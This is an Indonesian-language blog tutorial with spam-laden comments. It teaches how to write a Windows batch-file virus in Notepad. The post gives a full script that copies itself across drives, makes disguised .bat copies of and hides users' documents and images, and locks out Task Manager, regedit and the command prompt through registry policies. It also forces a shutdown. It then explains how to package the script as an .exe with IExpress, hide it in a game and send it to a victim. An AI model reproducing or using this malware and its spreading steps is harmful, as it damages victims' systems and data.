Ciptakan virus hebat lewat File batch VS Notpad

Pengunjung yang baik hati kali ini saya mau coba kasih ilmu yang lumayan nyeleneh………..kenapa nyeleneh ?”. kalau mau tw jawabannya lihat dari judulnya aja oke..,

Perlu di ingat saya disini bukan mau ngajarin kejahatan tapi ngajarin kebaikan

Karena ada pepatah “ Kenali dulu penyakit yang kita derita setelah itu barulah kita beli resep obatnya “. Artinya jangan beli obat sakit perut kalau yang sakitnya adalah kepala…..bisa kacau tuch…..

Kita kembali ke topic kita,

Banyak orang berpikir membuat virus itu susah , karena harus mengerti bahasa pemograman seperti Vb (visual basic) , C++ (Bahasa C) dan Asembler .

Memang program seperti yang saya sebutkan ,merupakan bahasa program yang lumayan runyem bagi para pemula, Apalagi kalau kita bicara program Asembler bisa –bisa gila….dibuatnya.

Padahal kalau ada kemauan pasti ada jalan, ya salah satunya yang kita bisa manfatkan adalah Program Notpad atau worpad yang ada di All program –Aksecories-notpad atau worpad.

Program ini mampu menciptakan virus yang lumayan Ganas dan paling tidak bisa buat orang kesel……he…he..….,

Terus gimana caranya program ini bisa menciptakan Virus?” Pertanyaan yang bagus .dalam OS windows kita sering mengenal yang namanya cmd (command prompt) sebuah program yang bersifat Under Dos yang bekerja langsung kedalam registry komputer dan perlu kita ketahui semua kerja system pada Windows di kendalikan oleh registry , jadi kalau kita ingin mengubah system dalam komputer maka kita harus tahu dulu akses ke dalam registry.

Ternyata dengan menggunakan fasilitas Notpad yang di dalamnya ada syntax tertentu yang kemudian di simpan dengan file berekstensi .*bat, mampu menciptakan virus yang cukup berkesan.

(kaya cinta aja berkesan ………..(^_^)”)

Dalam memulai proyek ini sebaiknya kita backup terlebih dahulu registry komputer kita kedalam media penyimpanan eksternal seperti CD, DVD,Flashdisk dll.,agar ketika kita melakukan kesalahan kita bisa mengemablikan registry pada keadaan semula .

Untuk lebih jelasnya perhatikan langkah-langkah di bawah ini:

· Buka jendela Run melalui start-Run , Lalu ketik kata regedit pada kotak Open kemudian Klik OK untuk membuka Registri Editor

· Klik File-Export

· Setelah muncul kotak dialog Export registri file ,ketikan nama file yang akan anda gunakan di kotak file name .

· Pada kotak combo Save as type ,pilih Registration Files(*.reg),

· Untuk menyimpan semua pengaturan registry pilih Opsi All pada radio button Export range .

· Kalau udah klik save.

Jika terjadi kesalahan maka kita tinggal mengimport registry yang telah kita simpan tersebut caranya masuk kedalam registri seperti kita waktu membackup registry dengan catatan bahwa kita masih bisa mengakses regedit tempat registry …nah yang jadi masalah virus yang akan kita buat ini adalah virus yang akan mampu menghilangkan akses user kedalam Task manager, command prompt , folder option dan regedit , karena kalau kita biarkan fasilitas ini bisa di akses oleh user maka sia-sialah virus yang kita buat……..

Karena fasilitas tersebut mampu membunuh file tempat virus yang bernaung …..

Jadi gimana dong supaya komputer kita tetap aman …”?,koq jadi kaya buah simalakama dimakan salah enggak dimakan juga salah;”

Tenang jangan panic dulu saya akan kasih tahu caranya yaitu menggunakan fasilitas restore point (mengembalikan konfigurasi windows ke kondisi semula) coba perhatikan langkah-langkah berikut :

· Klik start program- accessories – system tools – system restore.

· Setelah muncul dialog system restore ,pilih create restore point ,kemudian klik next untuk melanjutkanya .

· Isikan nama restore point yang akan kita gunakan pada restore point description misalnya kita menggunakan nama ”kondisi bagus nech”.

· Klik create ,selanjunya akan muncul jendela restore point created ,yang memberikan inforamsi bahwa retore point baru telah berhasil di bentuk dengan menampilakn tanggal dan waktu pembuatannya ,serta nama restore point yang akan kita gunakan .

· Klik close untuk menutup kotak dialog sytem restore point .

Tadi baru aja kita simpan restore point terus giamana caranya untuk memanggil restore point tersebut untuk itu ikuti langkah-langkah berikut:

· Kilik –start Program –accsesories –sytem tools sytem restore point .

· Stealah muncul kotak dialog sytem restore ,pilih my Komputer to an earlier time kemudian klik next untuk melanjutkanya .

· Tentukan tanggal yang akan kita guankan untuk mengembalikan kondisi komputer kita .tanggal terebut merupakan tanggal dimana anda pernah membuat restore point dan kali ini kita kan memanggil restore point pada tanggal tersebut .tanggal yang akatif akan tercetak lebih tebal dari tanggal yang lain , klik next untuk melanjutkannya

· Selanjutnya akan muncul kotak dialkog confirm restore point selection ,yang memberikan berbagai macam informasi klik next untuk melanjutkannya .

· Selanjutnya komputer akan melakukan restart .setelah proses selesai akan muncul kotak dialog yang menyatakan restoration complete .

Kira kira seperti itulah pencegahanya nah kalau udah selesai dengan semua persiapan maka kita mulai aja proyek virusnya.

Yang perlu kita lakukan kita buka dulu notpad melalui start-allprogram –accessories-notpad atau melalui menu run ktikan notpad lalu klik OK.

Kalau udah coba ketikan scriptnya seperti di bawah ini:

Echo off

Cls

Echo Halooo……semua

Pause

kalau udah coba simpan dengan nama proyek1.bat pada dropdown save type pilih All files, lalu klik save ,untuk mudahnya lihat gambar berikut

Sekarang coba jalankan file yang telah kita simpan misal di drive E: kemudian cari file dengan nama proyek1.bat, setelah ketemu doble klik pda file tersebut dan inilah hasilnya:

Nah kenapa bisa begitu alasannya :

· Pertama kita menggunkan perintah echo off yang fungsinya untuk menampilkan pesan ,

· Cls sendiri berfungsi untuk membersihkan layar pada saat pesan tersebut di tampilkan ,

· Pause perintah yang berfungsi untuk menghentikan proses program sementara waktu ,dan akan kembali menjalankan perintah ketika kita menekan sembarang key pada board”Makanya muncul kalimat “Press any key to continue”.

Sebenarnya banyak sekali perintah –perintah yang bisa dilakukan dalam under dos windows baik eksternal maupun internal untuk lebih jelasnya silakan cari sendiri refrensinya….he…he….

Contoh diatas hanya sedikit dari kehebatan notpad dan file batch(*.bat ).]

Saya akan kasih langsung script virus yang pernah saya buat tapi ingat jangan di pake jahil ya…..

Coba ketik Script berikut ini ! :

Echo off

If no exist c:\windows\%0copy0% c:\windows

For %%p in(A C D E F) do copy%0 %%p:

For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat

For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r

REG ADD HKCU\Software\Microsoft\Windows\currentVersion\

Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/vNoFind /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/ vNoRun /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f

REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\System/DisableRegistryTools /t REG_DWORD/d 1/f

Shutdown –sd –t 60 –c “Tak ada pertahanan yang sempurna di muka bumi ini by:Jombi_par_hackers”-f

Exit

Nah gimana kira-kira pusing enggak lihat script yang lumayan runyem?…….,jangan di pikir runyemnya tapi lihat khasiatnya…he…he..,(Obat kali…)

Kalau udah diketik simpan aja filenya dengan nama proyek2.bat kalau enggak mau buat file baru buka aja file proyek1.bat yang udah kita buat caranya gampang koq cari file itu terus klik kanan pilih menu Edit kayak yang di gambar ini nih..

gampang kan?, ya iyalah gampang.

Sekarang saya mau jelasin sedikit soal script diatas soalnya ada yang nanya apa sih maksud script itu? Ini di jawabannya:

· If no exist c:\windows\%0copy0% c:\windows ;script ini artinya virus akan memeriksa apakah dirinya telah berada di direktori C:\Windows ataukah belum ,jika belum maka virus akan mengcopykan dirinya kedalam direktori tersebut . 0% di gunakan buat menghandle nama file dari dirinya.

· For %%p in(A C D E F) do copy%0 %%p: maksud dari perintah ini file virus akan mengcopykan kedalam direktori A ,C, D, F, .%% character ini menunjukkan perintah perulangan sebanyak p dan q sedangkan 0% digunakan untuk menghandle file virus .

· For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat,perintah ini akan menciptakan file *.bat yang baru dengan ekstensi *jpg, *.exe *.doc , sesuai dengan yang di sebutkan jika ada sebuah file *.doc Misal: riset.doc maka menjadi riset.doc.bat.

· For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r,nah kalau yang ini baru namanya virus he..he….. kenapa begitu ?”, karena script ini akan mengecek semua file berexstensi (*.jpg *.doc *.gif *.exe) yang kemudian menghidden atau menyembuyikan file tersebut .dengan mode super hidden makanya ada +h +s .+h menghidden file kemudian akan di simpan dalam mode super hidden dengan perintah +s

· Kemudian perintah REG_ADD……maksudnya akan memasukan nilai string maupun bolean kedalam registri yang tentunya nilai-nilai /d 0/f, /d 1/f, /d 4/f tresebut memiliki fungsi tersendiri untuk lebih jelasnya cari aja sendiri..referensinya…..ya …

· Shutdown –s –t 60 –c “Tak ada pertahanan yang sempurna di muka bumi ini by:Jombi_par_hackers”-f

Perintah ini akan menampilkan pesan seperti yang tertulis pada script “Tak ada….”kemudian akan memaksa komputer shutdown dalam hitungan mundur yaitu selama 60 detik makanya ada script –t 60(catatan nilai 60 bisa diganti sesuai keinginan kita misal:15 )biar cepat mati tuch komputernya…he…..-s adalah perintah shutdown nah kalau -f setelah hitungan mudur 60 detik maka komputer akan di paksa untuk shutdownt……ih ngeri banget ya……..

Sekarang udah selesai nih sebenarnya udah sih Cuma kurang afdol kalau filenya masih ada kata-kata kaya yang ditunjukan gambar yang inih;

Kalau mau nyebarin virus enggak jauh beda kalau kita lagi promosi sesuatu gimana caranya bungkus product kita menarik bagi konsumennya ,so banyak yang beli dech , nah kalau gitu gimana kalau file virus ini kita ubah menjadi file berekstensi *.Exe, kemudian kita sisipkan kedalam aplikasi game atau aplikasi yang lain sehinggga file ini akan menjadi program aplikasi seperti contoh berikut

Lihat pada copy proyek 1 urutan tiga gimana kerenkan enggak ada lagi yang namanya MS-Dos batch File yang kesannya jaoel banget……he…he….

Terus gimana caranya untuk buat exstensi *.Exe,ikuti langkah-langkah berikut:

  • Klik kanan pada Start –pilih explorer –pada document setting(drive C)-cari foder Windows.

Stelah itu –cari system32-kemudian klik IExpress lihat gbr berikut:

Kira-kira kaya begitu dech….

  • Klik aja next-kalau keluar Box Package Purpose-Pilih Extract files and run and installation command-klik next.
  • Pada box packageTitle-ketikan nama file yang baru – kalau udah pilih Next.
  • Pada confirmation prompt-pilih no prompt-klik Next.
  • Pada box license agreement-klik Don’t display a license-klik Next.
  • Pada box package Files –pilih tab Add, disini kita disuruh mencari file yang akan kita ubah atau di Exstrack ( proyek1.bat)
  • Kalau udah klik Next aja,kalau muncul box seperti gambar berikut : and disuruh memasukan kata-kata sebelum program ini diinstal nantinya semacam kotak konfirmasi gitu dech…buat ajalah terserah anda kalau udah di Next lagi donk,

  • Pada box finished massage pilihg aja No massage –klik Next, kalau muncul box baru dengan pesan Package name And Option “ ,perintah ini memerintahkan kita untuk membuat folder untuk menyimpan hasil exstracksi file proyek 1.bat tersebut.
  • Stelah itu akan muncul box create package –klik aja Next dan tunggu beberapa saat untuk melakukan exstraksi file sampai keluar Box yang memeberi pesan kalau proses extrasi telah selesai –terus klik Next.

Untuk melihat hasilnya buka folder yang kita buat sebelumnya seperti contoh berikut , jreng……..

file itu berubah menjadi dua File yang satu berexstensi *.Exe, dan yang satu berexstensi .*Txt ,kalau udah gini berarti kita udah siap menyebar virus cemen( centil tapi menakutkan) ini he…he..(^_^),sebenernya cara ini bukanlah satu-satunya cara untuk mengexstarck tapi masih ada yang lebih sederhana sebenarnya saya pengen ngasih tahu Cuma kalau saya kasih tahu terus entar jadi manja lagi ..,udah enggak usah dipikirin,

Sekarang tugas kita tinggal nyimpan folder tersebut kedalam folder yang brehubungan dengan program aplikasi yang paling di gemari misalnya kita simpan dalam direktori game kemudian kasih dech ke gamenya ke orang yang dituju …salah klik maka habislah dia …..eh…eh ….20x,

Nah kalu udah tahu jangan di pake iseng ya………nanti saya kena marah loh…..

Udah dulu ah…..dah cape nech…….Good luck and see you next time!!!!

Created by:

jombi_par@yahoo.com

33 responses to “Ciptakan virus hebat lewat File batch VS Notpad

  1. Yeyep Juni 23, 2008 pukul 9:21 am

    wkwkwk wkwkwk boleh juga nih untuk pengetahuan

  2. rahmatvinacerpus Juli 27, 2008 pukul 1:00 pm

    terimkasih mas yeyep sory agak telat di jawab ,

  3. ghanank Desember 3, 2008 pukul 7:13 am

    kalo batch file nya gua dah tau tapi kalo bisa kasih tau dunkz gimana manggil batch file tadi lewat vb 6…jadi tinggal klik langsung execute…share ya..

  4. ade Februari 22, 2009 pukul 7:00 am

    Maaf mas ini ringkasan dari buku “Belajar Membuat Virus Komputer Mulai dari Nol” ya? Penulis Fauzi Adi Rafrastara. Memang keren hasil dari virus tersebut dan sangat mudah membuatnya apa lagi kalo kita paham tentang regedit dan memodifikasi script tersebut bisa menjadi ciri khas dari virus yang kita buat kan?,thanks infonya ya…

  5. ary April 7, 2009 pukul 12:41 am

    mas untuk titorial Membuat Aplikasi Absensi Menggunakan Visual Basic ( Part 3) mana ???
    aq tunggu yaaa…. tanks

  6. Doni April 23, 2009 pukul 10:36 am

    gue kena virus macam itu, gmana cara nanggulangix,dah discan pake ansav,cuma 2 ug g bs dihapusdi system 32,trus malah keluar macem2,ky tiap start kluar notepad,minta instal macam2,trus explorer terbuka sampe 10x,regedit ma task manager dikunci by admin namax virus everthing…plees bantuin dong

  7. wirya Mei 25, 2009 pukul 11:04 am

    bos gimana cara nyebarnya??
    alnya setelah di coba ga da pengaruh apapun!!!

  8. wawan Juli 11, 2009 pukul 11:27 pm

    coy kurang lengkap keteranganmu

  9. AND April 7, 2011 pukul 7:16 pm

    Terimakasih,lumayan Infonya tambah lagi donk info lainnya misal virus yang buat delet semua bios atau apalah ok.

  10. Bethany Desember 12, 2012 pukul 12:35 am

    Wow, incredible blog structure! How long have you been blogging for?
    you made running a blog glance easy. The full glance of your site is
    fantastic, as smartly as the content material!

  11. Pirate Bay unblocked Agustus 22, 2013 pukul 4:57 pm

    But maintaining a large number of files to seed require you have space to hold them, hence the
    need for a seed box. torrent files are available at a few
    different locations determined by what you are looking for.
    On the server you receive just what you need up and running and
    zip you don’t.

  12. lung cancer egfr Desember 23, 2013 pukul 11:51 am

    you’re truly a excellent webmaster. The web
    site loading pace is amazing. It kind of feels that you are doing any distinctive trick.
    In addition, The contents are masterwork. you have performed a excellent process on this matter!

  13. nopalea reviews mayo clinic Januari 11, 2014 pukul 8:52 pm

    Hi! I’m at work surfing around your blog from my new apple iphone!

    Just wanted to say I love reading through your blog and look forward to all your posts!

    Keep up the great work!

  14. rosacea behandeling Januari 12, 2014 pukul 2:51 am

    If some one wishes expert view regarding running a blog afterward i advise him/her to go to see this weblog, Keep up the nice
    job.

  15. Elinor Februari 4, 2014 pukul 10:05 am

    Hey would you mind sharing which blog platform you’re
    working with? I’m going to start my own blog in the near future but I’m having
    a difficult time selecting between BlogEngine/Wordpress/B2evolution and
    Drupal. The reason I ask is because your design seems different then most
    blogs and I’m looking for something completely
    unique. P.S My apologies for getting off-topic but I had to ask!

  16. العاب دورا Februari 5, 2014 pukul 7:59 am

    افضل فيديو العاب دورا ، دورا ، dora , dora games شاهدته في حياتي

  17. children place coupon Februari 9, 2014 pukul 12:57 am

    I don’t even know how I ended up here, but I thought this post was great.
    I don’t know who you are but certainly you are going to a famous blogger if you are not already ;
    ) Cheers!

  18. http://Www.Youtube.com Februari 10, 2014 pukul 3:48 pm

    Have you ever thought about including a little bit more than just your articles?

    I mean, what you say is important and all. But just imagine
    if you added some gdeat visuals or videos to give your posts more, “pop”!
    Your content is excellent but with images and videos, this blog could
    definitely be one of thhe greatest in its field. Excellent
    blog!

  19. clash of clans cheats hack for gems Februari 20, 2014 pukul 7:17 pm

    Hi! I could have sworn I’ve visited this site before but after
    going through some of the articles I realized it’s new to me.
    Nonetheless, I’m definitely delighted I came across it and I’ll
    be bookmarking it and checking back frequently!

  20. buying twitter followers Februari 23, 2014 pukul 12:50 pm

    If you want to take a great deal from this post then you have
    to apply such methods to your won webpage. buying twitter followers upon facebook to grow your
    current supporters rapidly.
    facebook report, free twitter followers, have more
    Fans upon facebook

  21. wow Februari 28, 2014 pukul 6:22 am

    Therefore, you are much more valuable to the other players, almost like a teacher when they hit a road-block in the game.
    However, there remains debate over whether quantum
    phenomena are truly random, or whether we are simply yet incapable of determining a pattern.
    He can also choose the Eagles and other teams, comfortably when
    the boss, looks better than the Lakers’ Kobe
    Bryant tune swallow look strong.

  22. bankruptcy attorney Omaha Maret 6, 2014 pukul 2:01 pm

    I’ve got to tell you – If you make money as an affiliate selling one product at a
    time without getting some kind of recurring commissions,
    you’re really making it hard on yourself when it doesn’t have to be.
    Your articles can be republished in ezines and on websites.

    Are you a marketing professional looking to move away from your current job.

  23. wow brasil Maret 13, 2014 pukul 1:04 am

    Indy – Car – Nation Dario Franchitti is your 2010 IZOD Indy – Car Series
    Overall and Oval Champion. Reins of the Red Drake – Allows you to summon a fast mount in
    Northrend or Outland. For as old as it is, you would think we would know everything there is to know
    about it.

  24. wow map Maret 21, 2014 pukul 10:12 am

    As you earn the trust and esteem of the group you’re questing for or representing with a tabard, you’ll also gain
    access to the items sold by their quartermaster. Fans that are interested
    in this incredible creation should take a look at the slide-show above, of which contains
    a number of screenshots that have been taken from the “Crafting Azeroth” project.
    These tears erupt into rifts, specific to whatever element the obtrusive plane is.

  25. Gregg Agustus 2, 2014 pukul 1:39 am

    What a material of un-ambiguity and preserveness oof precious know-how concerning unpredicted feelings.

  26. twitter Agustus 20, 2014 pukul 1:18 pm

    Thank you for some other informative web site.
    The place else may just I get that type of information written in such an ideal method?
    I’ve a challenge that I’m just now running on,
    and I’ve been at the glance out for such information.
    twitter
    twitter
    twitter

  27. Http://Infinimod.Com/Jelly-Splash-Cheats-Hack September 3, 2014 pukul 2:37 am

    It’s appropriate time to make some plans for the future and it is time to
    be happy. I’ve read this put up and if I could I wish to suggest you some attention-grabbing
    issues or suggestions. Maybe you can write subsequent articles referring to this article.
    I wish to learn more issues approximately it!

  28. acne treatment systems Oktober 3, 2014 pukul 8:02 am

    You actually make it appear so easy together with your presentation however I to find this matter to be actually something that I believe I
    might by no means understand. It kind of feels too complex
    and very vast for me. I am looking ahead to your next post,
    I’ll try to get the dangle of it!

  29. youtube Desember 15, 2014 pukul 3:40 pm

    I’m gone to tell my little brother, that he should also visit this website on regular basis
    to take updated from most recent reports.
    youtube
    youtube
    youtube

  30. youtube Desember 17, 2014 pukul 11:58 pm

    I’m gone to convey my little brother, that he
    should also pay a visit this weblog on regular basis to get updated from hottest news.
    youtube
    youtube

  31. youtube Januari 10, 2015 pukul 1:41 pm

    Hi there terrific website! Does running a
    blog similar to this require a massive amount work? I’ve absolutely no knowledge
    of coding but I was hoping to start my own blog in the near
    future. Anyways, if you have any recommendations
    or techniques for new blog owners please share. I know this is off
    subject however I simply wanted to ask. Cheers!
    youtube
    youtube
    youtube

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: